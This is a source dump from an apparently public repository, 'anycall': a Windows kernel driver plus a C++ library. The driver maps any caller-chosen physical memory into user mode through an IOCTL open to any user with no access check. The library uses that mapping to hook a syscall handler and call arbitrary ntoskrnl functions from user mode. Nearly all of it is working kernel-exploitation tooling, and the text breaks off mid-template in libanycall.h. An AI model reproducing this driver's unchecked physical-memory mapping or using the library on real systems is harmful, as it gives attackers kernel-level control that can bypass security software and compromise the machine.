24 |
25 |
26 | Source Files
27 |
28 |
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 |
41 |
42 | Driver Files
43 |
44 |
45 |
--------------------------------------------------------------------------------
/anydrv/dbg.h:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 |
29 | #ifndef _AC_DBG_H_
30 | #define _AC_DBG_H_
31 |
32 | #include
33 |
34 | //
35 | // enable debug prints if set 1
36 | //
37 | #define AC_ENABLE_DEBUG 0
38 |
39 | #if AC_ENABLE_DEBUG
40 | #define AC_KDPRINT( format, ... ) \
41 | DbgPrint( format, __VA_ARGS__ );
42 | #else
43 | #define AC_KDPRINT
44 | #endif
45 |
46 | #endif // _AC_DBG_H_
--------------------------------------------------------------------------------
/anydrv/main.c:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #include "main.h"
28 |
29 | _Dispatch_type_( IRP_MJ_CREATE )
30 | _Dispatch_type_( IRP_MJ_CLOSE )
31 | DRIVER_DISPATCH AcCreateClose;
32 |
33 | _Dispatch_type_( IRP_MJ_DEVICE_CONTROL )
34 | DRIVER_DISPATCH AcDeviceControl;
35 |
36 | DRIVER_UNLOAD AcUnloadDriver;
37 |
38 | VOID PrintIrpInfo( PIRP Irp );
39 |
40 | NTSTATUS
41 | AcDeviceControl
42 | (
43 | PDEVICE_OBJECT DeviceObject,
44 | PIRP Irp
45 | )
46 | {
47 | NTSTATUS ntStatus = STATUS_SUCCESS;
48 | PIO_STACK_LOCATION irpSp; // current stack location
49 | ULONG inBufLength; // length of input buffer
50 | ULONG outBufLength; // length of output buffer
51 | PCHAR inBuf = NULL, outBuf = NULL; // pointer to Input and output buffer
52 |
53 | UNREFERENCED_PARAMETER( DeviceObject );
54 |
55 | PAGED_CODE();
56 |
57 | irpSp = IoGetCurrentIrpStackLocation( Irp );
58 | inBufLength = irpSp->Parameters.DeviceIoControl.InputBufferLength;
59 | outBufLength = irpSp->Parameters.DeviceIoControl.OutputBufferLength;
60 |
61 | if ( !inBufLength || !outBufLength )
62 | {
63 | ntStatus = STATUS_INVALID_PARAMETER;
64 | goto Exit;
65 | }
66 |
67 | switch ( irpSp->Parameters.DeviceIoControl.IoControlCode )
68 | {
69 | case IOCTL_AC_MAP_PHYSICAL_MEMORY:
70 | {
71 | //
72 | // map physical memory
73 | //
74 |
75 | AC_KDPRINT( "IOCTL_AC_MAP_PHYSICAL_MEMORY Requested\n" );
76 |
77 | PrintIrpInfo( Irp );
78 |
79 | inBuf = Irp->AssociatedIrp.SystemBuffer;
80 | outBuf = Irp->AssociatedIrp.SystemBuffer;
81 |
82 | PAC_MAP_PHYSICAL_MEMORY_REQUEST request =
83 | ( PAC_MAP_PHYSICAL_MEMORY_REQUEST )inBuf;
84 |
85 | AcMapPhysicalMemoryForUser(
86 | ( UINT_PTR* )outBuf, // result mapped va
87 | request->PhysicalAddress, // physical address to map
88 | request->Size ); // size
89 |
90 | Irp->IoStatus.Information = sizeof( UINT_PTR );
91 |
92 | break;
93 | }
94 | case IOCTL_AC_UNMAP_PHYSICAL_MEMORY:
95 | {
96 | //
97 | // unmap mapped virtual memory
98 | //
99 |
100 | AC_KDPRINT( "IOCTL_AC_UNMAP_PHYSICAL_MEMORY Requested\n" );
101 |
102 | PrintIrpInfo( Irp );
103 |
104 | inBuf = Irp->AssociatedIrp.SystemBuffer;
105 | outBuf = Irp->AssociatedIrp.SystemBuffer;
106 |
107 | PAC_UNMAP_VIRTUAL_MEMORY_REQUEST request =
108 | ( PAC_UNMAP_VIRTUAL_MEMORY_REQUEST )inBuf;
109 |
110 | ntStatus = AcUnmapMappedPhysicalMemoryForUser(
111 | request->VirtualAddress,
112 | request->Size );
113 |
114 | Irp->IoStatus.Information = NT_SUCCESS( ntStatus );
115 |
116 | break;
117 | }
118 | default:
119 | {
120 | ntStatus = STATUS_INVALID_DEVICE_REQUEST;
121 |
122 | AC_KDPRINT( "ERROR: unknown IOCTL code specified: 0x%x\n",
123 | irpSp->Parameters.DeviceIoControl.IoControlCode );
124 |
125 | Irp->IoStatus.Information = 0;
126 |
127 | break;
128 | }
129 | } // switch ( irpSp->Parameters.DeviceIoControl.IoControlCode )
130 |
131 | Exit:
132 | Irp->IoStatus.Status = ntStatus;
133 |
134 | IoCompleteRequest( Irp, IO_NO_INCREMENT );
135 |
136 | return ntStatus;
137 | }
138 |
139 | VOID
140 | PrintIrpInfo
141 | (
142 | PIRP Irp
143 | )
144 | {
145 | PIO_STACK_LOCATION irpSp;
146 | irpSp = IoGetCurrentIrpStackLocation( Irp );
147 |
148 | PAGED_CODE();
149 |
150 | AC_KDPRINT( "Irp->AssociatedIrp.SystemBuffer = 0x%p\n",
151 | Irp->AssociatedIrp.SystemBuffer );
152 | AC_KDPRINT( "Irp->UserBuffer = 0x%p\n", Irp->UserBuffer );
153 | AC_KDPRINT( "irpSp->Parameters.DeviceIoControl.Type3InputBuffer = 0x%p\n",
154 | irpSp->Parameters.DeviceIoControl.Type3InputBuffer );
155 | AC_KDPRINT( "irpSp->Parameters.DeviceIoControl.InputBufferLength = %d\n",
156 | irpSp->Parameters.DeviceIoControl.InputBufferLength );
157 | AC_KDPRINT( "irpSp->Parameters.DeviceIoControl.OutputBufferLength = %d\n",
158 | irpSp->Parameters.DeviceIoControl.OutputBufferLength );
159 |
160 | return;
161 | }
162 |
163 | NTSTATUS DispatchDriverEntry
164 | (
165 | IN PDRIVER_OBJECT DriverObject,
166 | IN PUNICODE_STRING RegistryPath
167 | )
168 | {
169 | NTSTATUS ntStatus;
170 | UNICODE_STRING ntDeviceNameUs;
171 | UNICODE_STRING dosDeviceNameUs;
172 | PDEVICE_OBJECT deviceObject = NULL;
173 |
174 | UNREFERENCED_PARAMETER( RegistryPath );
175 |
176 | RtlInitUnicodeString( &ntDeviceNameUs, AC_NT_DEVICE_NAME );
177 |
178 | ntStatus = IoCreateDevice(
179 | DriverObject, // our driver object
180 | 0, // we don't use a device extension
181 | &ntDeviceNameUs, // device name
182 | FILE_DEVICE_UNKNOWN, // device type
183 | FILE_DEVICE_SECURE_OPEN, // device characteristics
184 | FALSE, // not an exclusive device
185 | &deviceObject ); // returned pointer to Device Object
186 |
187 | if ( !NT_SUCCESS( ntStatus ) )
188 | {
189 | AC_KDPRINT( "Failed to create device\n" );
190 | return ntStatus;
191 | }
192 |
193 | DriverObject->MajorFunction[ IRP_MJ_CREATE ] = AcCreateClose;
194 | DriverObject->MajorFunction[ IRP_MJ_CLOSE ] = AcCreateClose;
195 | DriverObject->MajorFunction[ IRP_MJ_DEVICE_CONTROL ] = AcDeviceControl;
196 | DriverObject->DriverUnload = AcUnloadDriver;
197 |
198 | RtlInitUnicodeString( &dosDeviceNameUs, AC_DOS_DEVICE_NAME );
199 |
200 | ntStatus = IoCreateSymbolicLink( &dosDeviceNameUs, &ntDeviceNameUs );
201 |
202 | if ( !NT_SUCCESS( ntStatus ) )
203 | {
204 | AC_KDPRINT( "Failed to create symbolic link\n" );
205 | AC_KDPRINT( " ---> NTSTATUS: 0x%lX\n", ntStatus );
206 |
207 | IoDeleteDevice( deviceObject );
208 | }
209 |
210 | return ntStatus;
211 | }
212 |
213 | //
214 | // this will be called by the I/O system when the IOCTL is opened or closed
215 | //
216 | NTSTATUS
217 | AcCreateClose
218 | (
219 | PDEVICE_OBJECT DeviceObject,
220 | PIRP Irp
221 | )
222 | {
223 | UNREFERENCED_PARAMETER( DeviceObject );
224 |
225 | PAGED_CODE();
226 |
227 | Irp->IoStatus.Status = STATUS_SUCCESS;
228 | Irp->IoStatus.Information = 0;
229 |
230 | IoCompleteRequest( Irp, IO_NO_INCREMENT );
231 |
232 | return STATUS_SUCCESS;
233 | }
234 |
235 | //
236 | // this will be called when the driver being unloaded
237 | //
238 | VOID
239 | AcUnloadDriver
240 | (
241 | IN PDRIVER_OBJECT DriverObject
242 | )
243 | {
244 | PDEVICE_OBJECT deviceObject = DriverObject->DeviceObject;
245 | UNICODE_STRING dosDeviceNameUs;
246 |
247 | PAGED_CODE();
248 |
249 | AC_KDPRINT( "Unload Driver\n" );
250 |
251 | RtlInitUnicodeString( &dosDeviceNameUs, AC_DOS_DEVICE_NAME );
252 | IoDeleteSymbolicLink( &dosDeviceNameUs );
253 |
254 | if ( deviceObject != NULL )
255 | {
256 | IoDeleteDevice( deviceObject );
257 | }
258 | }
259 |
260 | //
261 | // this will be called after the driver loaded
262 | //
263 | NTSTATUS DriverInitialize
264 | (
265 | IN PDRIVER_OBJECT DriverObject,
266 | IN PUNICODE_STRING RegistryPath
267 | )
268 | {
269 | UNREFERENCED_PARAMETER(DriverObject);
270 | UNREFERENCED_PARAMETER(RegistryPath);
271 |
272 | return STATUS_SUCCESS;
273 | }
274 |
275 | //
276 | // main entry point of this driver
277 | //
278 | NTSTATUS DriverEntry
279 | (
280 | IN PDRIVER_OBJECT DriverObject,
281 | IN PUNICODE_STRING RegistryPath
282 | )
283 | {
284 | AC_KDPRINT( "Driver Entry\n" );
285 | return DispatchDriverEntry( DriverObject, RegistryPath );
286 | }
--------------------------------------------------------------------------------
/anydrv/main.h:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 |
29 | #ifndef _AC_MAIN_H_
30 | #define _AC_MAIN_H_
31 |
32 | #include
33 |
34 | #include "dbg.h"
35 | #include "pmem.h"
36 |
37 | #define AC_NT_DEVICE_NAME L"\\Device\\ANYCALL_IO"
38 | #define AC_DOS_DEVICE_NAME L"\\DosDevices\\ANYCALL_IO"
39 |
40 | #define AC_IOCTL_TYPE 40000
41 |
42 | #define IOCTL_AC_MAP_PHYSICAL_MEMORY \
43 | CTL_CODE( AC_IOCTL_TYPE, 0x900, METHOD_BUFFERED, FILE_ANY_ACCESS )
44 |
45 | #define IOCTL_AC_UNMAP_PHYSICAL_MEMORY \
46 | CTL_CODE( AC_IOCTL_TYPE, 0x901, METHOD_BUFFERED, FILE_ANY_ACCESS )
47 |
48 | typedef struct _AC_MAP_PHYSICAL_MEMORY_REQUEST
49 | {
50 | UINT_PTR PhysicalAddress;
51 | SIZE_T Size;
52 | } AC_MAP_PHYSICAL_MEMORY_REQUEST, * PAC_MAP_PHYSICAL_MEMORY_REQUEST;
53 |
54 | typedef struct _AC_UNMAP_VIRTUAL_MEMORY_REQUEST
55 | {
56 | UINT_PTR VirtualAddress;
57 | SIZE_T Size;
58 | } AC_UNMAP_VIRTUAL_MEMORY_REQUEST, * PAC_UNMAP_VIRTUAL_MEMORY_REQUEST;
59 |
60 | #endif // _AC_MAIN_H_
--------------------------------------------------------------------------------
/anydrv/pmem.c:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma warning( disable : 4047 ) // '=': 'unsigned int' differs in levels of indirection from 'PUCHAR'
28 | #pragma warning( disable : 4022 ) // 'ZwUnmapViewOfSection': pointer mismatch for actual parameter 2
29 | #include "pmem.h"
30 |
31 | NTSTATUS
32 | AcMapPhysicalMemoryForUser
33 | (
34 | OUT PUINT_PTR VirtualAddress,
35 | IN UINT_PTR PhysicalAddress,
36 | IN SIZE_T Size
37 | )
38 | {
39 | NTSTATUS ntStatus = STATUS_SUCCESS;
40 | UNICODE_STRING ObjectNameUs;
41 | OBJECT_ATTRIBUTES ObjectAttributes;
42 | HANDLE SectionHandle;
43 | PVOID Object;
44 | ULONG BusAddressSpace;
45 | PHYSICAL_ADDRESS PhysicalAddressStart;
46 | PHYSICAL_ADDRESS PhysicalAddressEnd;
47 | PHYSICAL_ADDRESS ViewBase;
48 | BOOLEAN HalTranslateResult1, HalTranslateResult2;
49 | PUCHAR pBaseAddress = NULL;
50 |
51 | AC_KDPRINT( "\nCalled %s\n", __FUNCTION__ );
52 |
53 | AC_KDPRINT( " ---> Physical Address: 0x%llX\n", PhysicalAddress );
54 | AC_KDPRINT( " ---> Size : 0x%lX\n", Size );
55 |
56 | //
57 | // zero buffer is our responsibility
58 | //
59 | *VirtualAddress = 0;
60 |
61 | PHYSICAL_ADDRESS _PhysicalAddress;
62 | _PhysicalAddress.QuadPart = PhysicalAddress;
63 |
64 | RtlInitUnicodeString( &ObjectNameUs, L"\\Device\\PhysicalMemory" );
65 |
66 | InitializeObjectAttributes( &ObjectAttributes,
67 | &ObjectNameUs,
68 | OBJ_CASE_INSENSITIVE,
69 | ( HANDLE )NULL,
70 | ( PSECURITY_DESCRIPTOR )NULL );
71 |
72 | //
73 | // open section handle
74 | //
75 | ntStatus = ZwOpenSection(
76 | &SectionHandle, SECTION_ALL_ACCESS, &ObjectAttributes );
77 |
78 | if ( !NT_SUCCESS( ntStatus ) )
79 | {
80 | AC_KDPRINT( "ERROR: ZwOpenSection Failed\n" );
81 | AC_KDPRINT( " ---> NTSTATUS: 0x%lX\n", ntStatus );
82 |
83 | return ntStatus;
84 | }
85 |
86 | ntStatus = ObReferenceObjectByHandle(
87 | SectionHandle,
88 | SECTION_ALL_ACCESS,
89 | ( POBJECT_TYPE )NULL,
90 | KernelMode,
91 | &Object,
92 | ( POBJECT_HANDLE_INFORMATION )NULL );
93 |
94 | if ( !NT_SUCCESS( ntStatus ) )
95 | {
96 | AC_KDPRINT( "ERROR: ObReferenceObjectByHandle Failed\n" );
97 | AC_KDPRINT( " ---> NTSTATUS: 0x%lX\n", ntStatus );
98 |
99 | ZwClose( SectionHandle );
100 | return ntStatus;
101 | }
102 |
103 | PhysicalAddressStart.QuadPart = ( ULONGLONG )( ULONG_PTR )PhysicalAddress;
104 | PhysicalAddressEnd.QuadPart = PhysicalAddressStart.QuadPart + Size;
105 |
106 | BusAddressSpace = 0;
107 | HalTranslateResult1 =
108 | HalTranslateBusAddress( 0, 0, PhysicalAddressStart, &BusAddressSpace, &PhysicalAddressStart );
109 |
110 | BusAddressSpace = 0;
111 | HalTranslateResult2 =
112 | HalTranslateBusAddress( 0, 0, PhysicalAddressEnd, &BusAddressSpace, &PhysicalAddressEnd );
113 |
114 | if ( !HalTranslateResult1 || !HalTranslateResult2 )
115 | {
116 | AC_KDPRINT( "ERROR: HalTranslateBusAddress Failed\n" );
117 |
118 | ZwClose( SectionHandle );
119 | return STATUS_UNSUCCESSFUL;
120 | }
121 |
122 | Size = ( SIZE_T )PhysicalAddressEnd.QuadPart - ( SIZE_T )PhysicalAddressStart.QuadPart;
123 | ViewBase = PhysicalAddressStart;
124 |
125 | ntStatus = ZwMapViewOfSection(
126 | SectionHandle,
127 | NtCurrentProcess(),
128 | &pBaseAddress,
129 | 0L,
130 | Size,
131 | &ViewBase,
132 | &Size,
133 | ViewShare,
134 | 0,
135 | PAGE_READWRITE | PAGE_NOCACHE );
136 |
137 | if ( !NT_SUCCESS( ntStatus ) )
138 | {
139 | AC_KDPRINT( "ERROR: ZwMapViewOfSection Failed\n" );
140 | AC_KDPRINT( " ---> NTSTATUS: 0x%lX\n", ntStatus );
141 |
142 | ZwClose( SectionHandle );
143 | return ntStatus;
144 | }
145 |
146 | pBaseAddress += PhysicalAddressStart.QuadPart - ViewBase.QuadPart;
147 | *VirtualAddress = pBaseAddress;
148 |
149 | AC_KDPRINT( "SUCCESS: Physical memory [0x%llX -> 0x%llX] mapped to virtual memory [0x%llX -> 0x%llX]\n",
150 | PhysicalAddress, PhysicalAddress + Size,
151 | *VirtualAddress, *VirtualAddress + Size );
152 |
153 | ZwClose( SectionHandle );
154 | return ntStatus;
155 | }
156 |
157 | NTSTATUS AcUnmapMappedPhysicalMemoryForUser(
158 | IN UINT_PTR VirtualAddress,
159 | IN SIZE_T Size )
160 | {
161 | AC_KDPRINT( "\nCalled AcUnmapMappedPhysicalMemoryForUser\n" );
162 |
163 | AC_KDPRINT( " ---> Virtual Address : 0x%llX\n", VirtualAddress );
164 | AC_KDPRINT( " ---> Size : 0x%lX\n", Size );
165 |
166 | NTSTATUS ntStatus = STATUS_SUCCESS;
167 |
168 | ntStatus = ZwUnmapViewOfSection( NtCurrentProcess(), VirtualAddress );
169 |
170 | if ( !NT_SUCCESS( ntStatus ) )
171 | {
172 | AC_KDPRINT( "ERROR: ZwUnmapViewOfSection Failed\n" );
173 | AC_KDPRINT( " ---> NTSTATUS: 0x%lX\n", ntStatus );
174 | AC_KDPRINT( " ---> Virtual Address: 0x%llX\n", VirtualAddress );
175 | AC_KDPRINT( " ---> Size: 0x%lX\n", Size );
176 |
177 | return ntStatus;
178 | }
179 |
180 | AC_KDPRINT( "SUCCESS: Virtual Address [0x%llX -> 0x%llX] is now unmapped\n",
181 | VirtualAddress,
182 | VirtualAddress + Size );
183 |
184 | return ntStatus;
185 | }
186 |
--------------------------------------------------------------------------------
/anydrv/pmem.h:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 |
29 | #ifndef _AC_PMEM_H_
30 | #define _AC_PMEM_H_
31 |
32 | #include
33 | #include "dbg.h"
34 |
35 | NTSTATUS AcMapPhysicalMemoryForUser(
36 | OUT PUINT_PTR VirtualAddress,
37 | IN UINT_PTR PhysicalAddress,
38 | IN SIZE_T Size );
39 |
40 | NTSTATUS AcUnmapMappedPhysicalMemoryForUser(
41 | IN UINT_PTR VirtualAddress,
42 | IN SIZE_T Size );
43 |
44 | #endif // _AC_PMEM_H_
--------------------------------------------------------------------------------
/how.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kkent030315/anycall/b072368dec14c287c1a0ba1b329e0b3243a34113/how.png
--------------------------------------------------------------------------------
/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kkent030315/anycall/b072368dec14c287c1a0ba1b329e0b3243a34113/image.png
--------------------------------------------------------------------------------
/libanycall/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
4 |
--------------------------------------------------------------------------------
/libanycall/libanycall.cpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #include "pch.h"
28 | #include "libanycall.h"
29 |
30 | #include "../anycall/io.hpp"
31 | #include "../anycall/helper.hpp"
32 | #include "../anycall/hook.hpp"
33 | #include "../anycall/syscall.hpp"
34 | #include "../anycall/driver.hpp"
35 |
36 | #define ANYCALL_API_IMPL
37 |
38 | ANYCALL_API_IMPL bool libanycall::init(
39 | std::string_view module_name,
40 | std::string_view function_name )
41 | {
42 | return
43 | io::init() &&
44 | syscall::setup( module_name, function_name );
45 | }
46 |
47 | ANYCALL_API_IMPL void* libanycall::get_procedure()
48 | {
49 | return syscall::function;
50 | }
51 |
52 | ANYCALL_API_IMPL bool libanycall::hook(
53 | void* source, void* detour, bool writable )
54 | {
55 | return hook::hook( source, detour, writable );
56 | }
57 |
58 | ANYCALL_API_IMPL bool libanycall::unhook(
59 | void* source, bool writable )
60 | {
61 | return hook::unhook( source, writable );
62 | }
63 |
64 | ANYCALL_API_IMPL libanycall::SYSMODULE_RESULT libanycall::find_sysmodule(
65 | const std::string_view module_name )
66 | {
67 | const auto result =
68 | helper::find_sysmodule_address( module_name );
69 |
70 | return {
71 | result.base_address,
72 | result.image_full_path };
73 | }
74 |
75 | ANYCALL_API_IMPL uint64_t libanycall::find_export(
76 | std::string module_name,
77 | const std::string_view export_name )
78 | {
79 | return helper::find_export( module_name, export_name );
80 | }
81 |
82 | ANYCALL_API_IMPL uint64_t libanycall::find_ntoskrnl_export(
83 | const std::string_view export_name,
84 | const bool as_rva )
85 | {
86 | return helper::find_ntoskrnl_export( export_name, as_rva );
87 | }
88 |
89 | ANYCALL_API_IMPL uint64_t libanycall::map_physical_memory(
90 | uint64_t physical_address, size_t size )
91 | {
92 | return driver::map_physical_memory( physical_address, size );
93 | }
94 |
95 | ANYCALL_API_IMPL void libanycall::unmap_physical_memory(
96 | uint64_t virtual_address, size_t size )
97 | {
98 | driver::unmap_physical_memory( virtual_address, size );
99 | }
--------------------------------------------------------------------------------
/libanycall/libanycall.h:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 | #include
29 | #include
30 | #include
31 | #include
32 | #include
33 |
34 | #define ANYCALL_INVOKE( function_name, ... ) \
35 | libanycall::invoke< function_name >( \
36 | ( void* )libanycall::find_ntoskrnl_export( \
37 | #function_name ), __VA_ARGS__ );
38 |
39 | namespace libanycall
40 | {
41 | typedef struct _SYSMODULE_RESULT
42 | {
43 | uint64_t base_address; // base address of the module
44 | std::string image_full_path; // full path of the module
45 | } SYSMODULE_RESULT, * PSYSMODULE_RESULT;
46 |
47 | extern "C" void* syscall_handler();
48 |
49 | extern bool init(
50 | std::string_view module_name,
51 | std::string_view function_name );
52 |
53 | extern uint64_t find_export(
54 | std::string module_name,
55 | const std::string_view export_name );
56 | extern SYSMODULE_RESULT find_sysmodule( const std::string_view module_name );
57 | extern uint64_t find_ntoskrnl_export(
58 | const std::string_view export_name,
59 | const bool as_rva = false );
60 |
61 | extern void* get_procedure();
62 | extern bool hook( void* source, void* detour, bool writable = false );
63 | extern bool unhook( void* source, bool writable = false );
64 |
65 | extern uint64_t map_physical_memory( uint64_t physical_address, size_t size );
66 | extern void unmap_physical_memory( uint64_t virtual_address, size_t size );
67 |
68 | template < class FnType, class ... Args >
69 | std::invoke_result_t< FnType, Args... > invoke(
70 | void* detour, Args ... augments )
71 | {
72 | constexpr auto is_void =
73 | std::is_same<
74 | std::invoke_result_t< FnType, Args... >, void >{};
75 |
76 | const auto procedure = get_procedure();
77 |
78 | libanycall::hook( procedure, detour, true );
79 |
80 | if constexpr ( is_void )
81 | {
82 | reinterpret_cast< FnType >( syscall_handler )( augments ... );
83 | }
84 | else
85 | {
86 | const auto invoke_result =
